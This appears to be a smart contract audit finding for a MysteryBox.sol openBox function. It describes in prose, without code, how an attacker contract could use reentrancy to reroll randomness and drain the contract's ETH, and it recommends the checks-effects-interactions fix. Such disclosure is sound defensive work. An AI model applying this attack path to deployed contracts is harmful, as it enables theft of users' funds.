Summary

After we determine the randomValue, there is the selection of the possbility of a winner based on percentages, if an attacker was to write an attack contract that stepped into the contract and reentered the contract over and over they could not only reroll the randomValue and break randomness but also if they got the number which they wanted could continiously drain the contract of ETH.

Vulnerability Details

An attacker using an attack contract could be able to reeneter and possibly reroll the randomValue and also focus solely on a high earning reward thus draining the victim contract of all ETH using the reentrancy attack vector.

Impact

The contract could have all ETH drained, impact would be high.

Tools Used

Manual Review

Recommendations

Implement a Check Effects Interactions style system within the MysteryBox.sol:openBox function. Moving boxesOwned subtraction to before the determination of the reward would ensure that the user would not be able to reenter endlessly.